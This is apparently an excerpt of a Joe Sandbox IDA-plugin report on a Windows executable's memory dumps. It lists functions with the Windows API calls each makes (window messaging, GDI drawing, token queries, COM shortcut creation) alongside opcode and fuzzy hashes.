Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: ffadbaaa2c530616728be4d9b6a3a3a1fb844732685a39e1baee55349d6e57ec
Instruction ID: dc586e5a6f7292a7b44308e52ea8c3457c2034252a4d90963ce3cbe4a502810e
Opcode Fuzzy Hash: ffadbaaa2c530616728be4d9b6a3a3a1fb844732685a39e1baee55349d6e57ec
Instruction Fuzzy Hash: B8416E35504219FBDF159F68C848BEEBB74FB05324F24435AF868A22D0C7759950DBB1

Function 00D56920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D5695D
TranslateAcceleratorW.USER32(?,?,?), ref: 00D569A9
TranslateMessage.USER32(?), ref: 00D569D2
DispatchMessageW.USER32(?), ref: 00D569DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D569EB

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 75771657da8316db54b1266ec87a45a22bd3481007672a2c5046dd6e9658f05d
Instruction ID: 0e39a129f7e8d7534e18020848c0364088c4f18123973a6b2f446dc283b077ec
Opcode Fuzzy Hash: 75771657da8316db54b1266ec87a45a22bd3481007672a2c5046dd6e9658f05d
Instruction Fuzzy Hash: 9A31A171504247AADF208F74CC44FB6BBA8EB15306F584669EC61D32A1E635D88DDFB0

Function 00D58F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00D58F12
PostMessageW.USER32(?,00000201,00000001), ref: 00D58FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00D58FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00D58FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00D58FDA

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: f7867367ff98168bfabb579af2be530cc5c476bc5dcbc9a7a88ab6674f94ade0
Instruction ID: baae98d74a183235a2c461df5bf5b8a53e1d020bee9a0028d8390c9eff014e47
Opcode Fuzzy Hash: f7867367ff98168bfabb579af2be530cc5c476bc5dcbc9a7a88ab6674f94ade0
Instruction Fuzzy Hash: 5031DF71500219EBDF00CF68D94DAAE7BB6EF08316F104229FD25E72D0C7B09918EBA0

Function 00D5B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00D5B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D5B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D5B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D5B742
_wcsstr.LIBCMT ref: 00D5B74C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: da443d621a1d0b1bb51b1886d6b3135bc5d337499250c9860629514201137d2d
Instruction ID: 2c458e4236c6544e93af9a57ea0a52cd979c09963a4214a6785e12adfe8e7747
Opcode Fuzzy Hash: da443d621a1d0b1bb51b1886d6b3135bc5d337499250c9860629514201137d2d
Instruction Fuzzy Hash: 52210731204344BAEF255B39AC4AE7B7B98DF59721F14802AFC05CA2A1EF61CC4097B0

Function 00D8B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

GetWindowLongW.USER32(?,000000F0), ref: 00D8B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00D8B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00D8B489
GetSystemMetrics.USER32(00000004), ref: 00D8B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00D71184,00000000), ref: 00D8B4D0

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 129c3d03664c1b51e7f2b3be021c9ada836ff6387c652625cc1d9dc0db7f9211
Instruction ID: cbe286d8663efd0de11b093953371ab05a56f10c4cd4f03562756da1a0213c10
Opcode Fuzzy Hash: 129c3d03664c1b51e7f2b3be021c9ada836ff6387c652625cc1d9dc0db7f9211
Instruction Fuzzy Hash: C6216071510256AFCB10AF3CCC05A7A3BA4FB05739B18472AF966D72E1E730D851DBA0

Function 00D597E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D59802

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D59834
__itow.LIBCMT ref: 00D5984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D59874
__itow.LIBCMT ref: 00D59885

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 15190a532ab11352b4d1b6d4b87821c531860cf18fe26bbe0f40fefc7d7c5970
Instruction ID: 9848ad4304cc335fed96b874d3fdc94168e91a67273e246e2b29b4ccf711e836
Opcode Fuzzy Hash: 15190a532ab11352b4d1b6d4b87821c531860cf18fe26bbe0f40fefc7d7c5970
Instruction Fuzzy Hash: EC21B371A00204EBDF10AB65CC96EEEBFA9EF5A721F080025FD05DB291D6709D4987F1

Function 00D012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D0134D
SelectObject.GDI32(?,00000000), ref: 00D0135C
BeginPath.GDI32(?), ref: 00D01373
SelectObject.GDI32(?,00000000), ref: 00D0139C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 342b1b58d3a6d7b05ae8620bf7af2c8394332d41d517f8724882490c10558cfe
Instruction ID: bc8ffa6bcc58e8e65869cb2bd2268f6d3598e6289eda32e3d4c890e7a11ea319
Opcode Fuzzy Hash: 342b1b58d3a6d7b05ae8620bf7af2c8394332d41d517f8724882490c10558cfe
Instruction Fuzzy Hash: F521397080030AEFDB109F65DC08BA97BA8EF00321F588226F918D62E0D371D895DFB0

Function 00D5C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00D5C176
_memcmp.LIBCMT ref: 00D5C194
_memcmp.LIBCMT ref: 00D5C1A7
_memcmp.LIBCMT ref: 00D5C1BF
_memcmp.LIBCMT ref: 00D5C1D7

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 43173f733d87f122da56d5b67202601a1d8982831d4b6463de3ec9754a9b2fa0
Instruction ID: 2bafe2fb5019d02943c5c725e3a57ab9c4b6307e428f4fbadfc1a6277b77c851
Opcode Fuzzy Hash: 43173f733d87f122da56d5b67202601a1d8982831d4b6463de3ec9754a9b2fa0
Instruction Fuzzy Hash: 700192A16547157FEA14B6209C46EBF679CDB3139AB488021FD0496283EA60DE1982F1

Function 00D64D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00D64D5C
__beginthreadex.LIBCMT ref: 00D64D7A
MessageBoxW.USER32(?,?,?,?), ref: 00D64D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D64DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D64DAC

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 5303941d2e580247315de7e8ff20e838a3a5843a9c93eb32aa11deb0ecc368fa
Instruction ID: 3170075b051a393eba9114bd52da0d1bcdbbeae380b4ff150a565575212e77fc
Opcode Fuzzy Hash: 5303941d2e580247315de7e8ff20e838a3a5843a9c93eb32aa11deb0ecc368fa
Instruction Fuzzy Hash: 0811E1B2904309BFC7119BA8DC08ADABBACEB85324F184265F915D3390D675CD448BB0

Function 00D5874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D58766
GetLastError.KERNEL32(?,00D5822A,?,?,?), ref: 00D58770
GetProcessHeap.KERNEL32(00000008,?,?,00D5822A,?,?,?), ref: 00D5877F
HeapAlloc.KERNEL32(00000000,?,00D5822A,?,?,?), ref: 00D58786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D5879D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: a4415f24779362c69b165bfa30bfd8b0e03bb798f4594d82fde1b2c1bf84fe01
Instruction ID: 81453aab930cfd48cdd151478b996685f06bc19a9fdd2151482a42b109301321
Opcode Fuzzy Hash: a4415f24779362c69b165bfa30bfd8b0e03bb798f4594d82fde1b2c1bf84fe01
Instruction Fuzzy Hash: 360146B1210704EFDB204FA6DC88D6B7BADFF9A756B200569FC49D2260DA318C14DB70

Function 00D654E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D65502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D65510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D65518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D65522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D6555E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 1fcca52cb7ced49ab762ef4adb2af644ad8bd4e5f6784783c644c94e39a69acc
Instruction ID: b906d07aa979e533da332c7c35069ceb97b2eeda2d2c9a16632c60987219d13c
Opcode Fuzzy Hash: 1fcca52cb7ced49ab762ef4adb2af644ad8bd4e5f6784783c644c94e39a69acc
Instruction Fuzzy Hash: 8A013536C10B29DBCF00AFE8E88DAEDBB78BB09711F050456E942F2254DB30969087B1

Function 00D57652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D5758C,80070057,?,?,?,00D5799D), ref: 00D5766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D5758C,80070057,?,?), ref: 00D5768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D5758C,80070057,?,?), ref: 00D57698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D5758C,80070057,?), ref: 00D576A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D5758C,80070057,?,?), ref: 00D576B4

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 224a9aab87ea7e3000269834bd11fdc7fe987e1c4e9bd168ba7227d64928deab
Instruction ID: 276bd5168ab48807504d17cb884f908d0055c0f7175845d95c7b8c881be39b5e
Opcode Fuzzy Hash: 224a9aab87ea7e3000269834bd11fdc7fe987e1c4e9bd168ba7227d64928deab
Instruction Fuzzy Hash: B90171B2611714ABDB105F58EC44AAA7BBDEB44B52F240028FD08D2321E731DD4497B0

Function 00D585F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D58608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D58612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D58621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D58628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D5863E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 200fca89a68bea1839a43085baae04ca2ba750865db42afffd9ce6b564dda62b
Instruction ID: 6e924f8ba451b354bdb79aff6da88cf87f76e8e7ccebbc26a2af1f20130b4b6e
Opcode Fuzzy Hash: 200fca89a68bea1839a43085baae04ca2ba750865db42afffd9ce6b564dda62b
Instruction Fuzzy Hash: 49F03771211304AFEB100FA5DCCEF6B3BACEF8A755B140429FD49D6260DA619C45EB70

Function 00D58652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D58669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D58673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D58682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D58689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D5869F

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 170aaf9be44b1ad0946751f7e01215ee33be708a72d93c12d2e84ec22238cc1e
Instruction ID: 83bc3157e032c7403a9a508986e5d78089dc924a40854064aa2add35aeb2dfde
Opcode Fuzzy Hash: 170aaf9be44b1ad0946751f7e01215ee33be708a72d93c12d2e84ec22238cc1e
Instruction Fuzzy Hash: 27F0A9B0210304EFEB211FA4EC88E6B3BACEF89755B180029FD49D2250DA609804EB70

Function 00D5C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00D5C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 00D5C6D1
MessageBeep.USER32(00000000), ref: 00D5C6E9
KillTimer.USER32(?,0000040A), ref: 00D5C705
EndDialog.USER32(?,00000001), ref: 00D5C71F

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 14c094d023428af919a4d3a1db05795280fb66a6cb5991b0554d1307b297753f
Instruction ID: 8a3966ab4da4dac8a75db1df93fd6bf92c4fad6be83dcc321e8bf67263383ada
Opcode Fuzzy Hash: 14c094d023428af919a4d3a1db05795280fb66a6cb5991b0554d1307b297753f
Instruction Fuzzy Hash: 4B016230520704ABEF215B20DD4EF9677B8FF04706F041669F986E15E1EBE4A9988FB0

Function 00D013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00D013BF
StrokeAndFillPath.GDI32(?,?,00D3BAD8,00000000,?), ref: 00D013DB
SelectObject.GDI32(?,00000000), ref: 00D013EE
DeleteObject.GDI32 ref: 00D01401
StrokePath.GDI32(?), ref: 00D0141C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 17856d908761c36a7ab23817a311a03b6ef36f1cabce3f8e261b34b6b2a4e0d8
Instruction ID: ef6146bb849c9df2b361e71708a49a1ec18f598a7a92f1d3f5905402bfe77089
Opcode Fuzzy Hash: 17856d908761c36a7ab23817a311a03b6ef36f1cabce3f8e261b34b6b2a4e0d8
Instruction Fuzzy Hash: 7FF0B23401470AAFDB115FA6EC0CB583BA5AB01326F588224E569C92F1C735C9A5DF70

Function 00D6C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00D6C69D
CoCreateInstance.OLE32(00D92D6C,00000000,00000001,00D92BDC,?), ref: 00D6C6B5

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

CoUninitialize.OLE32 ref: 00D6C922

Strings

.lnk, xrefs: 00D6C631, 00D6C659, 00D6C663

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 653e15ee283de42385bba171d9066baaaa5e8e8b61e09b4b9e257ef778798abb
Instruction ID: 3d0dc9bf07f59fb603e6e1b7a4f0439d08a566252745f02c137d550e654b7ebb
Opcode Fuzzy Hash: 653e15ee283de42385bba171d9066baaaa5e8e8b61e09b4b9e257ef778798abb
